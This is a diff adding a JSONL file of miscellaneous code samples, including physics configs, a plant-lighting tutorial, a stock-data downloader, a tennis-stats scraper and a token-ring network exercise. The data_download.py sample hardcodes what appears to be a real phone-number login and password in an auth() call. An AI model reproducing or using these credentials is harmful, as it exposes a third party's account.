diff --git "a/4164.jsonl" "b/4164.jsonl" new file mode 100644--- /dev/null +++ "b/4164.jsonl" @@ -0,0 +1,608 @@ +{"seq_id":"399278530","text":"import FWCore.ParameterSet.Config as cms\nfrom math import pi\nimport FWCore.Utilities.FileUtils as FileUtils\nimport FWCore.ParameterSet.VarParsing as VarParsing\n\n\nprocess = cms.Process(\"TEST\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\n\n\nprocess.load('Configuration.Geometry.GeometryExtended2026D35Reco_cff')\nprocess.load('Configuration.Geometry.GeometryExtended2026D35_cff')\n\noptions = VarParsing.VarParsing ('analysis')\n# get and parse the command line arguments\n\noptions.register('skipEvents',\n 0,\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.int,\n \"Number of events to skip\")\noptions.register('outFile',\n 'L1Ntuple.root',\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n 'Output file')\n\noptions.parseArguments()\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n)\n\nfileList = FileUtils.loadListFromFile('snu.list')\nreadFiles = cms.untracked.vstring(*fileList)\n\nprocess.source = process.source = cms.Source(\"PoolSource\",\n fileNames = readFiles,\n)\n\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase2_realistic', '')\n\nprocess.load(\"L1Trigger.L1TNtuples.l1TrackMETTreeProducer_cfi\")\n\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('L1Ntuple.root')\n)\n\n\nprocess.p = cms.Path(process.l1TrackMETTree)\n ","sub_path":"L1TTrackMatch/test/test_L1TrackMET_Ntuple_cfg.py","file_name":"test_L1TrackMET_Ntuple_cfg.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"14322464","text":"from pfisGraph import PfisGraph\nfrom pfisGraphWithVariants import PfisGraphWithVariants\nfrom pfisGraphWithSimilarPatches import PfisGraphWithSimilarPatches\n\nclass GraphFactory:\n\tdef __init__(self, langHelper, dbPath, projSrcPath, stopWords=[]):\n\t\tself.langHelper = langHelper\n\t\tself.dbPath = dbPath\n\t\tself.projSrcPath = projSrcPath\n\t\tself.stopWords = stopWords\n\n\tdef getGraph(self, graphType, variantsDb):\n\t\tif graphType == None:\n\t\t\tgraphType = \"PfisGraph\"\n\n\t\tif graphType.lower() == \"PfisGraph\".lower():\n\t\t\treturn PfisGraph(self.dbPath, self.langHelper, self.projSrcPath, self.stopWords)\n\n\t\tif graphType.lower() == \"PfisGraphWithVariants\".lower():\n\t\t\treturn PfisGraphWithVariants(self.dbPath, self.langHelper, self.projSrcPath, self.stopWords)\n\n\t\tif graphType.lower() == \"PfisGraphWithSimilarPatches\".lower():\n\t\t\tif variantsDb is None:\n\t\t\t\traise Exception(\"Missing attrib: variantsDb for graphType PfisGraphWithSimilarPatches in XML config file.\")\n\t\t\treturn PfisGraphWithSimilarPatches(self.dbPath, self.langHelper, self.projSrcPath, variantsDb, 
self.stopWords)","sub_path":"src/python/graphFactory.py","file_name":"graphFactory.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"629263758","text":"# ipython --gui=qt\nfrom cereals import build_shoot, parametric_leaf, leaf_azimuth, shoot_at_stage\nfrom display import display_mtg, build_scene, display_scene\nfrom stand import agronomic_plot\nfrom simple_maize import bell_shaped_dist, geometric_dist\nfrom geometry import form_factor\nimport pandas\nimport numpy\nimport sky_sources as skys\nimport light_it as ltfs\n\n\n\n# generation of a 3D plant from descritive parameters\nstem_radius=0.5\ninsertion_heights=(10,20)\nleaf_lengths=(10,10)\nleaf_areas=(10,10)\n# type ?parametric_leaf for parameter siginification\na_leaf = parametric_leaf(nb_segment=10, insertion_angle=50, scurv=0.5,curvature=50, alpha=-2.3)\nleaf_shapes = [a_leaf for l in leaf_lengths]\n# type ?leaf_azimuths for parameter siginification\nleaf_azimuths = leaf_azimuth(size=len(leaf_lengths), phyllotactic_angle=180, phyllotactic_deviation=15, plant_orientation=0, spiral=False)\n#\nshoot, g = build_shoot(stem_radius=stem_radius, insertion_heights=insertion_heights, leaf_lengths=leaf_lengths, leaf_areas=leaf_areas,\n leaf_shapes=leaf_shapes, leaf_azimuths=leaf_azimuths)\nscene, nump = build_scene(g)\ndisplay_scene(scene)\n\n# some plausible value for a maize plant\nstem_radius=1\nleaf_areas = bell_shaped_dist(plant_area=10000)\na_leaf = parametric_leaf(nb_segment=10, insertion_angle=50, scurv=0.5,curvature=50, alpha=-2.3)\nff = form_factor(a_leaf)\nleaf_lengths = numpy.sqrt(numpy.array(leaf_areas) / 0.1 / ff)\ninsertion_heights = numpy.cumsum(geometric_dist(height=200))\nleaf_shapes = [a_leaf for l in leaf_lengths]\nleaf_azimuths = leaf_azimuth(size=len(leaf_lengths), phyllotactic_angle=180, phyllotactic_deviation=15, plant_orientation=0, spiral=False)\n\n\n# some realistic values for a wheat plant\ndf = pandas.read_csv('wheat.csv')\nstem_radius=0.25\na_leaf = parametric_leaf(nb_segment=10, insertion_angle=30, scurv=0.5,curvature=20, alpha=-1.5)\nff = form_factor(a_leaf)\nleaf_areas = df.L_blade * df.W_blade * ff\nleaf_lengths = df.L_blade\ninsertion_heights = df.H_blade\nleaf_shapes = [a_leaf for l in leaf_lengths]\nleaf_azimuths = leaf_azimuth(size=len(leaf_lengths), phyllotactic_angle=600, phyllotactic_deviation=10, plant_orientation=0, spiral=True)\n\n\n# generate x,y position for a stand\nnplants, positions, domain, domain_area, unit = agronomic_plot(1, 1, 10,10,0.75)\nplants = [g for i in range(nplants)]\nscene, nump = build_scene(plants, positions)\ndisplay_scene(scene)\n\n# vertical light interception\ncs, ei, df = ltfs.illuminate(scene, scene_unit='cm')\ncs.plot(ei)\n\n\n\n#diffuse light interception\nsources = skys.sky_sources()\ncs, ei, df = ltfs.illuminate(scene, light=sources, scene_unit='cm')\ncs.plot(ei)\n\n# get score per plant\ndef score(res):\n return pandas.Series({'ei':(res.Ei*res.area).sum() / res.area.sum(),\n 'area': res.area.sum()})\ndf['nump']=nump\ndf.groupby('nump').apply(score)\n","sub_path":"cereals/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533925281","text":"import wget\nfrom jqdatasdk import *\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport json\n\n\ndef get_hs300_index():\n df = get_price(\"000300.XSHG\", start_date=\"2011-01-01\", 
end_date=\"2019-01-01\", fq=None)\n df.to_csv(r\"data_files\\HS300_None.csv\")\n\n\ndef get_hs300_future():\n info = pd.read_csv(r\"data_files\\future\\hs300_future_info.csv\", index_col=0)\n for contract in info[\"name\"]:\n df = get_price(contract + \".CCFX\", start_date=\"2011-01-01\", end_date=\"2019-01-01\", fq=None)\n df.to_csv(r\"data_files\\future\\%s.csv\" % contract)\n\n\ndef get_future_info():\n df = get_all_securities(types=['futures'])\n df.to_csv(r\"data_files\\future\\info.csv\", encoding=\"gbk\")\n\n\ndef get_hs300_stock_info():\n path = r\"data_files\\stock\\hs300_stocks.json\"\n stocks = {}\n for year in range(2011, 2019):\n first = \"%d-03-01\" % year\n second = \"%d-09-01\" % year\n stocks[first] = get_index_stocks('000300.XSHG', first)\n stocks[second] = get_index_stocks('000300.XSHG', second)\n with open(path, \"w\") as f:\n json.dump(stocks, f)\n\n\ndef get_hs300_stock_quote():\n code_path = r\"data_files\\stock\\hs300_stocks.json\"\n store_path = r\"data_files\\stock\\quote\\%s.csv\"\n with open(code_path, \"r\") as f:\n stocks = json.load(f)\n stock_set = set()\n for value in stocks.values():\n stock_set.update(value)\n for stock in stock_set:\n df = get_price(stock, start_date=\"2011-01-01\", end_date=\"2019-01-01\", fq=None)\n df.to_csv(store_path % stock)\n\n\ndef get_hs300_stock_bonus():\n code_path = r\"data_files\\stock\\hs300_stocks.json\"\n store_path = r\"data_files\\stock\\bonus\\%s.csv\"\n with open(code_path, \"r\") as f:\n stocks = json.load(f)\n stock_set = set()\n for value in stocks.values():\n stock_set.update(value)\n for stock in stock_set:\n q = query(finance.STK_XR_XD). \\\n filter(finance.STK_XR_XD.code == stock,\n finance.STK_XR_XD.report_date >= '2010-01-01',\n finance.STK_XR_XD.report_date <= '2019-01-01'). 
\\\n order_by(finance.STK_XR_XD.report_date)\n df = finance.run_query(q)\n df.to_csv(store_path % stock)\n\n\ndef get_hs300_stock_valuation():\n store_path = r\"data_files\\temp\\%s.csv\"\n stock_set = ['600760.XSHG', '002032.XSHE', '002120.XSHE', '002179.XSHE', '002271.XSHE', '002311.XSHE', '300142.XSHE', '603156.XSHG', '300296.XSHE', '002773.XSHE', '603986.XSHG', '601066.XSHG', '603259.XSHG', '601138.XSHG']\n for stock in stock_set:\n q = query(valuation.market_cap).filter(valuation.code == stock)\n panel = get_fundamentals_continuously(q, end_date=\"2019-01-01\", count=8 * 250)\n df = panel.minor_xs(stock)\n df.to_csv(store_path % stock)\n\n\ndef get_hs300_index_info():\n store_path = r\"data_files\\index\\weight\\%s.csv\"\n code_path = r\"data_files\\index\\HS300_index.csv\"\n index = pd.read_csv(code_path, index_col=0)\n for date in index.index:\n df = get_index_weights(\"000300.XSHG\", date)\n df.to_csv(store_path % date)\n\n\ndef get_hs300_future_price():\n info_path = r\"data_files\\future\\hs300_future_info.csv\"\n store_path = r\"data_files\\future\\settle\\settle.csv\"\n info = pd.read_csv(info_path, index_col=0)\n df = get_extras('futures_sett_price', list(info.index), start_date='2011-01-01', end_date='2019-01-01', df=True)\n df.to_csv(store_path)\n\n\ndef get_settle_param():\n base_url = r\"http://www.cffex.com.cn/sj/jscs/%s/%s/%s_1.csv\"\n start_date = datetime(2011, 1, 1)\n end_date = datetime(2019, 1, 1)\n for i in range((end_date - start_date).days + 1):\n date = start_date + timedelta(days=i)\n url = base_url % (date.strftime(\"%Y%m\"), date.strftime(\"%d\"), date.strftime(\"%Y%m%d\"))\n store_path = r\"data_files\\future\\param\\%s.csv\" % date.strftime(\"%Y%m%d\")\n # try:\n wget.download(url, store_path)\n # except Exception as err:\n # print(err)\n\n\ndef get_remain():\n print(get_query_count())\n\n\nif __name__ == \"__main__\":\n auth(\"15066299571\", \"jiayouLGX,1996.\")\n # get_hs300_future()\n # get_future_info()\n # get_hs300_index()\n # get_hs300_stock_info()\n # get_hs300_stock_quote()\n # get_hs300_stock_bonus()\n # get_hs300_stock_valuation()\n # get_hs300_index_info()\n # get_hs300_future_price()\n # get_settle_param()\n get_hs300_stock_valuation()\n get_remain()\n","sub_path":"data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"303401185","text":"import Read\nimport dht11\nimport sqlite3\nimport datetime\n\t\ndef sensorRead():\n\tID = Read.machinedata()\n\tweather = dht11.thermo()\n\treturn(ID, weather)\n\ndef dbConnect(dbFile):\n\ttry:\n\t\tconn = sqlite3.connect(dbFile)\n\t\treturn(conn)\n\texcept error as E:\n\t\tprint(E)\n\treturn(None)\n\ndef createTable(conn, sqlStatement):\n\ttry:\n\t\tc = conn.cursor()\n\t\tc.execute(sqlStatement)\n\texcept error as E:\n\t\tprint(E)\n\n#def insertData(conn, sqlStatement, ):\n#\ttry:\n#\t\tc = conn.cursor()\n#\t\tc.execute(sqlStatement)\n#\texcept error as E:\n#\t\tprint(E)\n\ndef main():\n\tdatetime = datetime.datetime.now()\n\tID = sensorRead[0]\n\ttemperature = sensorRead[1]\n\thumidity = sensorRead[2]\n\n\tdatabase = (\"/home/pi/TTFProject/flaskdb/venv/TTF.db\")\n\n\tsql_create_user = (\"\"\" CREATE TABLE IF NOT EXISTS userData (\n id integer PRIMARY KEY,\n datetime integer\n ); \"\"\")\n\n\tsql_create_weather = (\"\"\" CREATE TABLE IF NOT EXISTS weather (\n temperature integer PRIMARY KEY,\n humidity integer NOT NULL,\n ); \"\"\")\n\n\tsql_insert_userData = (\"INSERT 
INTO userData (id, DATETIME) VALUES (?, ?)\")\n\tsql_insert_weather = (\"INSERT INTO weather (temperature, humidity) VALUES (?, ?)\")\n\n\n\tconn = dbConnect(database)\n\tif conn is not None:\n\t\tc = conn.cursor()\n\t\tc.execute(sql_insert_userData, [ID, datetime])\n\t\tc.execute(sql_insert_weather, [temperature, humidity])\n\t\tconn.commit()\n\t\tconn.close()\n\nif __name__ == '__main__':\t\n\tmain()\n\n\n\n\n","sub_path":"MFRC522-python/machineData1.py","file_name":"machineData1.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85483332","text":"from setuptools import setup\nfrom distutils.util import convert_path\n\n\ndef find_version():\n environment = {}\n version_path = convert_path('wif/version.py')\n with open(version_path) as file:\n contents = file.read()\n exec(contents, environment)\n version = environment['__version__']\n return version\n\n\nsetup(\n name='wif',\n version=find_version(),\n description='WIF tools',\n url='http://github.com/ucll-3dcg/wif',\n author='Frederic Vogels',\n author_email='frederic.vogels@ucll.be',\n license='MIT',\n packages=['wif', 'wif.gui'],\n entry_points={\n 'console_scripts': ['wif=wif.main:main']\n },\n install_requires=['pillow', 'numpy', 'opencv-contrib-python'],\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"216628751","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 13 16:56:45 2014\r\n\r\n@author: Gaspard, Thomas, Arnaud\r\n\"\"\"\r\n\r\nfrom utils import *\r\n\r\nimport urllib\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport re\r\n\r\n\r\nmc_url_matches = \"http://www.atpworldtour.com/Share/Match-Facts-Pop-Up.aspx\"\r\n\r\nmc_fields = {\r\n# 'Tournament' : [ 0 , 'a' , None ],\r\n# 'Round' : [ 1 , 'td', None ],\r\n# 'Name' : [ 4 , 'a' , 'str' ],\r\n# 'Country' : [ 5 , 'p' , 'str' ],\r\n 'Aces' : [ 6 , 'td', 'int' ],\r\n 'DoubleFaults' : [ 7 , 'td', 'int' ],\r\n 'FirstServe' : [ 8 , 'td', 'stat'],\r\n 'FirstServePointsWon' : [ 9 , 'td', 'stat'],\r\n 'SecondServePointsWon' : [ 10, 'td', 'stat'],\r\n 'BreakPointsSaved' : [ 11, 'td', 'stat'],\r\n 'ServiceGamesPlayed' : [ 12, 'td', 'int' ],\r\n 'FirstServeReturnPointsWon' : [ 13, 'td', 'stat'],\r\n 'SecondServeReturnPointsWon': [ 14, 'td', 'stat'],\r\n 'BreakPointsConverted' : [ 15, 'td', 'stat'],\r\n 'ReturnGamesPlayed' : [ 16, 'td', 'int' ],\r\n 'TotalServicePointsWon' : [ 17, 'td', 'stat'],\r\n 'TotalReturnPointsWon' : [ 18, 'td', 'stat'],\r\n 'TotalPointsWon' : [ 19, 'td', 'stat']\r\n }\r\n\r\n\r\n# TODO time 68 minutes -> 68\r\n\r\ndef parseSimple(line, balise):\r\n return line.find(balise).contents[0]\r\n\r\ndef parseStr(line, balise):\r\n aux = line.find_all(balise)\r\n return [ aux[0].contents[0], aux[1].contents[0] ]\r\n\r\ndef parseInt(line, balise):\r\n aux = parseStr(line,balise)\r\n return [ int(aux[0]), int(aux[1]) ]\r\n\r\ndef parseStat(line, balise):\r\n aux = parseStr(line,balise)\r\n s1 = re.findall( \"\\((.*)/(.*)\\)\", aux[0])[0]\r\n s2 = re.findall( \"\\((.*)/(.*)\\)\", aux[1])[0]\r\n return [ int(s1[0]), int(s1[1]), int(s2[0]), int(s2[1]) ]\r\n\r\n\r\ndef getInfoRows(t,y,r,p):\r\n url_file = urllib.urlopen(mc_url_matches + \"?t=\" + t + \"&y=\" + y + \"&r=\" + r + \"&p=\" + p)\r\n dom = BeautifulSoup(url_file)\r\n a = dom.find_all('tr', 'infoRow')\r\n if len(a) != 20:\r\n return printError(\"Mauvaise 
longueur : \" + str(len(a)) + \" != 20\")\r\n return a\r\n\r\ndef getMatchInfos(t,y,r,p):\r\n a = getInfoRows(t,y,r,p)\r\n result = [ dict(), dict() ]\r\n \r\n for k,v in mc_fields.iteritems():\r\n line = a[v[0]]\r\n balise = v[1]\r\n if v[2] == 'str':\r\n l = parseStr(line, balise)\r\n result[0][k] = l[0]\r\n result[1][k] = l[1]\r\n elif v[2] == 'int':\r\n l = parseInt(line, balise)\r\n result[0][k] = l[0]\r\n result[1][k] = l[1]\r\n elif v[2] == 'stat':\r\n l = parseStat(line, balise)\r\n result[0][k] = l[0]\r\n result[0][k + \"Total\"] = l[1]\r\n result[1][k] = l[2]\r\n result[1][k + \"Total\"] = l[3]\r\n else:\r\n result[0][k] = parseSimple(line, balise)\r\n result[1][k] = parseSimple(line, balise)\r\n \r\n \r\n duration = int( re.findall('([0-9]+)', parseSimple(a[2], 'td'))[0] )\r\n result[0]['Duration'] = duration\r\n result[1]['Duration'] = duration\r\n \r\n result[0][\"IDPlayer\"] = re.findall('Players\\/(.*).aspx\\'\\,\\'_blank', a[4].find_all('a')[0].attrs['onclick'] )[0]\r\n result[1][\"IDPlayer\"] = re.findall('Players\\/(.*).aspx\\'\\,\\'_blank', a[4].find_all('a')[1].attrs['onclick'] )[0]\r\n result[0]['IDOpponent'] = result[1]['IDPlayer']\r\n result[1]['IDOpponent'] = result[0]['IDPlayer']\r\n \r\n namePlayers = parseStr( a[4], 'a')\r\n win = parseSimple(a[3], 'a')\r\n result[0]['Win'] = int(win == namePlayers[0] )\r\n result[1]['Win'] = int(win == namePlayers[1] )\r\n \r\n return result\r\n\r\n\r\ndef addMatchInfos(match, dicoPlayers):\r\n m = getMatchInfos( match['t'], match['y'], match['r'], match['p'] )\r\n for field in match:\r\n m[0][field] = match[field]\r\n m[1][field] = match[field]\r\n m[0]['Scores'] = m[0]['WinnerScores'] if m[0]['Win'] else m[0]['LoserScores']\r\n m[1]['Scores'] = m[1]['WinnerScores'] if m[1]['Win'] else m[1]['LoserScores']\r\n \r\n # May generate errors !!!\r\n m[0]['IDOpponent'] = dicoPlayers[ m[0]['IDOpponent'] ]['ID']\r\n m[1]['IDOpponent'] = dicoPlayers[ m[1]['IDOpponent'] ]['ID']\r\n m[0]['IDPlayer'] = dicoPlayers[ m[0]['IDPlayer' ] ]['ID']\r\n m[1]['IDPlayer'] = dicoPlayers[ m[1]['IDPlayer' ] ]['ID']\r\n \r\n return m\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Save/matchCrawler.py","file_name":"matchCrawler.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"298733306","text":"import os\nimport csv\nimport glob\n\n\ndef new_v(files_path, output_name):\n interesting_files = glob.glob(os.path.join(files_path, \"*.csv\"))\n result = None\n for filename in interesting_files:\n with open(filename) as fin:\n data = list(csv.reader(fin, delimiter=';'))\n if result is None:\n result = ([data[0]])\n result += data[1:]\n with open(output_name, 'w', newline='') as out:\n write = csv.writer(out, delimiter=';')\n write.writerows(result)\n\n\nnew_v('raw_results', 'raw_results.csv')\nnew_v('summary_results', 'summary_results.csv')\n","sub_path":"results/merge_results.py","file_name":"merge_results.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"737576","text":"import sqlite3\n\n\nconn = sqlite3.connect('study_part1.sqlite3')\ncurs = conn.cursor()\n\nquery1 = \"\"\"\nSELECT AVG(age)\nFROM example;\n\"\"\"\n\nquery2 = \"\"\"\nSELECT student\nFROM example\nWHERE sex='Female';\n\"\"\"\n\nquery3 = \"\"\"\nSELECT COUNT(studied)\nFROM example\nWHERE studied='True';\n\"\"\"\n\nquery4 = \"\"\"\nSELECT *\nFROM example\nORDER BY student DESC;\n\"\"\"\n\nqueries = 
[query1, query2, query3, query4]\n\n\ndef exe_query(query):\n records = curs.execute(query).fetchall()\n return f'{records} \\n'\n\n\nif __name__ == \"__main__\":\n for query in queries:\n print(exe_query(query))\n curs.close()\n conn.close()\n","sub_path":"study-guide/part1_queries.py","file_name":"part1_queries.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537098333","text":"numbers_in_set = int(input())\n\nwhile True:\n try:\n a_set = set(map(int, input().split()))\n if len(a_set) > numbers_in_set or len(a_set) < numbers_in_set:\n raise ValueError\n break\n except ValueError:\n print(f\"Invalid set. The number of elements has to be {numbers_in_set}.\")\n\nnumber_other_sets = int(input())\n\n\nfor i in range(number_other_sets):\n command, length = input().split()\n other_set = set(map(int, input().split()))\n getattr(a_set, command)(other_set)\n\nprint(sum(a_set))\n","sub_path":"src/Week8/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"5194717","text":"import threading\nimport queue\nimport LayerPhy\nimport random\n\nclass NetworkStack(object):\n\n def __init__(self, masterHost='127.0.0.1', baseport=10000, own_identifier=\"A\"):\n self.__applicationList = []\n self.__physicalLayer=LayerPhy.LayerPhy(upperLayerCallbackFunction=self.layer2_incomingPDU,\n masterHost=masterHost, baseport=baseport)\n\n self._layer2_outgoing_packages = queue.Queue()\n self._layer2_flag = threading.Event()\n self._own_identifier = own_identifier\n\n # Do not change!\n def leaveNetwork(self):\n self.__physicalLayer.API_leave()\n\n # Do not change!\n def applicationAddCallback(self, applicationPort, callBack):\n self.__applicationList.append((applicationPort, callBack))\n\n # Do not change!\n def application_layer_incomingPDU(self, source, applicationPort, pdu):\n for (thisApplicationPort, thisApplication) in self.__applicationList:\n if thisApplicationPort == applicationPort:\n thisApplication(source, applicationPort, pdu)\n\n # Do not change!\n def application_layer_outgoingPDU(self, destination, applicationPort, pdu):\n self.layer4_outgoingPDU(destination, applicationPort, pdu)\n\n def initiateToken(self):\n #L'ordinateur à le jeton, il peut donc envoyer un message.\n #On met la condition lui permettant d'envoyer un message à vrai\n self._layer2_flag.set()\n\n def layer4_incomingPDU(self, source, pdu):\n print(\"Layer4: Received %s from %s\" % (pdu, source))\n #On récupère le port d'application pour pouvoir appeler le callback\n #correspondant au port d'application\n port, _, body = pdu.partition(\":\")\n self.application_layer_incomingPDU(source, int(port), body)\n\n\n def layer3_incomingPDU(self, interface, pdu):\n print(\"Layer3: Interface %d: Received %s\" % (interface, pdu))\n #On récupère l'adresse de destination du message pour la comparer à la sienne\n dest, src, body = pdu.split(\"|\")\n if dest == self._own_identifier:\n #Si le message nous est destiné, on le transmet à la couche 4\n self.layer4_incomingPDU(src, body)\n else:\n #Sinon on le renvoie tel quel\n self.layer3_outgoingPDU(dest, pdu, src)\n\n def layer2_incomingPDU(self, interface, pdu):\n print(\"Layer2: Interface %d: Received %s\" % (interface, pdu))\n if interface == 0: # same ring\n nb_packages, _, data = pdu.partition(';')\n #On récupère le nombre de messages\n try:\n nb_packages = int(nb_packages)\n except:\n 
# Cas des paquets vide\n nb_packages = 0\n\n #On récupère la taille de chaque message\n len_packages = []\n for _ in range(nb_packages):\n len_package, _, data = data.partition(';')\n tmp = 0\n try:\n tmp = int(len_package)\n except:\n # Cas des paquets vide\n tmp = 0\n len_packages.append(tmp)\n #On sépare les paquets en sous-paquets (un sous-paquet est un message contenu dans le paquets)\n for len_package in len_packages:\n package, data = data[:len_package], data[len_package:]\n #On envoi le sous paquet à la couche 3\n self.layer3_incomingPDU(interface, package)\n\n else: # Another Ring, this is for routing, see later\n pass\n\n #On peut envoyer un message (un fois que le paquet à été traité)\n self._layer2_flag.set()\n\n def layer4_outgoingPDU(self, destination, applicationPort, pdu):\n print(\"Layer4: Sending message %s to %s\" % (pdu, destination))\n #On transmet le message à la couche 3 en y ajoutant le port d'application,\n #séparé par un : du corps du message : \n # :\n self.layer3_outgoingPDU(destination,\n ':'.join([str(applicationPort),\n pdu]))\n\n def layer3_outgoingPDU(self, destination, pdu, from_=None):\n print(\"Layer3: Sending out %s to interface %d\" % (pdu, 0))\n #On transmet le message à la couche 2 en y ajoutant l'adresse de \n #de destination et l'adresse source, séparé par des | :\n # ||\n self.layer2_outgoingPDU(0,\n \"{dest}|{src}|{body}\".format(dest=destination, src=from_ or\n self._own_identifier, body=pdu))\n\n\n def layer2_outgoingPDU(self, interface, pdu):\n print(\"Layer2: Sending out %s to interface %d\" % (pdu, interface))\n #On ajoute le message dans la file d'attente\n self._layer2_outgoing_packages.put(pdu)\n #On attent de pouvoir envoyer un message\n self._layer2_flag.wait()\n\n #Lorsqu'on peut envoyer un message\n packages = []\n try:\n while True:\n packages.append(self._layer2_outgoing_packages.get())\n except queue.Empty:\n pass\n #On forme le paquet :\n # ;;...;\n msg = '{};'.format(len(packages))\n for package in packages:\n msg += '{};'.format(len(package))\n for package in packages:\n msg += package\n\n print(\"Layer2: Sending out %s to interface %d\" % (msg, interface))\n self.__physicalLayer.API_sendData(interface, msg)\n","sub_path":"NetworkStack.py","file_name":"NetworkStack.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"108201554","text":"# File: simulation.py\n\nimport random\nimport utils\nfrom math_objects import Interval, PRECISION\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nN = 10\n\ndef find_interval(val, intervals):\n\tfor interval in intervals:\n\t\tif interval.within(val):\n\t\t\treturn interval\n\treturn None\n\ndef dist_to_closest_interval(val, intervals):\n\tinterval = find_interval(val, intervals)\n\n\tassert interval != None\n\n\tmid = (interval.getUpper() + interval.getLower())/2\n\n\tif val < mid:\n\t\treturn val - interval.getLower()\n\telif val > mid:\n\t\treturn interval.getUpper() - val\n\telse:\n\t\treturn 0\n\ndef search(arr, val, search_index = 0):\n\tfor index, el in enumerate(arr):\n\t\tif el[search_index] == val:\n\t\t\treturn index\n\treturn None\n\ndef test_n_intervals(n):\n\n\tpts = []\n\tk = 0\n\tkMax = 10000\n\tI = Interval(0, 1)\n\tI.prepare(1e-4)\n\tsmall_intervals = I.partition_discrete(n)\n\tp = 0 \n\twhile(True):\n\t\trpt = I.randompt()\n\t\tp = max(0, rpt)\n\t\td = dist_to_closest_interval(rpt, small_intervals)\n\t\tsearch_index = search(arr = pts, val = round(rpt, PRECISION), 
search_index = 0)\n\t\tif search_index != None:\n\t\t\tpts[search_index][1] += d\n\t\t\t#print(pts[search_index])\n\t\telse:\n\t\t\tpts.append([ round(rpt, PRECISION), d ]) \n\t\tif k >= kMax:\n\t\t\tbreak\n\t\telse:\n\t\t\tk += 1\n\tprint(p)\n\treturn pts\n\ndef plot_data(results):\n\tdata = np.array(results)\n\tdata = data[data[:,0].argsort()]\n\tplt.xticks(list(range(0,len(results),100)), data[:,0])\n\tplt.plot(data[:,0],data[:,1].astype(float))\n\t#plt.plot(a[:,2].astype(float))\n\tplt.show()\t\n\nif __name__ == '__main__':\n\tresult = test_n_intervals(N)\n\tplot_data(result)\n\t#print(result)\n\n\n\n","sub_path":"Computing-Error-Range-Using-Monte-Carlo-Simulation/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"304545901","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\nfrom msrest.exceptions import HttpOperationError\n\n\nclass CloudError(Model):\n \"\"\"CloudError.\n \"\"\"\n\n _attribute_map = {\n }\n\n\nclass Error(Model):\n \"\"\"Error.\n\n :param status:\n :type status: int\n :param message:\n :type message: str\n \"\"\"\n\n _attribute_map = {\n 'status': {'key': 'status', 'type': 'int'},\n 'message': {'key': 'message', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(Error, self).__init__(**kwargs)\n self.status = kwargs.get('status', None)\n self.message = kwargs.get('message', None)\n\n\nclass ErrorException(HttpOperationError):\n \"\"\"Server responsed with exception of type: 'Error'.\n\n :param deserialize: A deserializer\n :param response: Server response to be deserialized.\n \"\"\"\n\n def __init__(self, deserialize, response, *args):\n\n super(ErrorException, self).__init__(deserialize, response, 'Error', *args)\n\n\nclass FirstParameterGroup(Model):\n \"\"\"Additional parameters for a set of operations, such as:\n ParameterGrouping_post_multi_param_groups,\n ParameterGrouping_post_shared_parameter_group_object.\n\n :param header_one:\n :type header_one: str\n :param query_one: Query parameter with default. Default value: 30 .\n :type query_one: int\n \"\"\"\n\n _attribute_map = {\n 'header_one': {'key': '', 'type': 'str'},\n 'query_one': {'key': '', 'type': 'int'},\n }\n\n def __init__(self, **kwargs):\n super(FirstParameterGroup, self).__init__(**kwargs)\n self.header_one = kwargs.get('header_one', None)\n self.query_one = 